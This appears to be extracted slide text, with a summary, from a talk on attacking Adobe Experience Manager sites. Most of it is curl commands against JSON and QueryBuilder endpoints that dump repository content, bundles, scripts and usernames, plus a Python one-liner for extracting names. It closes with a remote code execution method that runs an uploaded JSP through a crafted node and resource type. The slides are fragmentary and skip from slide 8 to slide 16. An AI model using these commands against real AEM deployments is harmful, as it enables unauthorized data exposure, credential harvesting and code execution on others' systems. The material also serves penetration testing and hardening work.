The document summarizes techniques for hacking into Adobe Experience Manager sites. It provides commands to retrieve sensitive information like usernames, password hashes, and installed bundles. It also demonstrates how to achieve remote code execution on the system by uploading a script, copying it to the apps folder to load it, and then triggering it by accessing a specific URL. The document aims to reveal vulnerabilities that could provide unauthorized access or allow attackers to execute arbitrary code on the targeted system.
4. • Sensitive information from JCR
• Installed OSGI bundles
• Custom scripts
• Usernames
• Password hashes
• Elements that allow anonymous modification
What do we want
5. • Use JsonRendererServlet
Sensitive information from JCR
curl -X “GET” http://127.0.0.1:8080/.json
curl -X “GET” http://127.0.0.1:8080/.6.json
curl -X “GET” http://127.0.0.1:8080/.tidy.6.json
curl -X “GET” http://127.0.0.1:8080/.tidy.infinity.json
6. • List of all bundles
• QueryBuilder is your friend!
http://docs.adobe.com/docs/en/cq/5-6-1/dam/customizing_and_extendingcq5dam/query_builder.html
Installed OSGI bundles
curl -X “GET” http://127.0.0.1:8080/bin.tidy.infinity.json
curl -X “GET” http://127.0.0.1:8080/bin/querybuilder.json
7. • List customs scripts
• List compiled custom scripts from cache
Custom scripts
curl -X “GET” http://127.0.0.1:8080/apps.tidy.infinity.json
curl -X “GET” http://127.0.0.1:8080/var/classes.tidy.infinity.json
8. • Dump content node properties
• Use regular expression to extract usernames (pipe with prev command)
Usernames
curl -X “GET” http://127.0.0.1:8080/content.infinity.json
python -c 'import sys,re; print "n".join([m.group(1) for m in
re.finditer("".+?By":"(.+?)"",sys.stdin.readlines()[0])])' |
sort –u
16. • We have node – http://127.0.0.1:8080/rce
• We have script exec.jsp that is magically loaded into node –
http://127.0.0.1:8080/apps/rcetype
• When someone navigates to http://127.0.0.1:8080/rce.exec our
exec.jsp will be executed.
Remote code execution
{"jcr:createdBy":"admin","jcr:created":"Sun May 03 2015 21:24:38
GMT+0300","jcr:primaryType":"nt:folder","exec.jsp":{"jcr:createdBy":"admin","jcr:crea
ted":"Sun May 03 2015 21:24:38 GMT+0300","jcr:primaryType":"nt:file"}}
{"sling:resourceType":"rcetype","jcr:primaryType":"nt:unstructured"}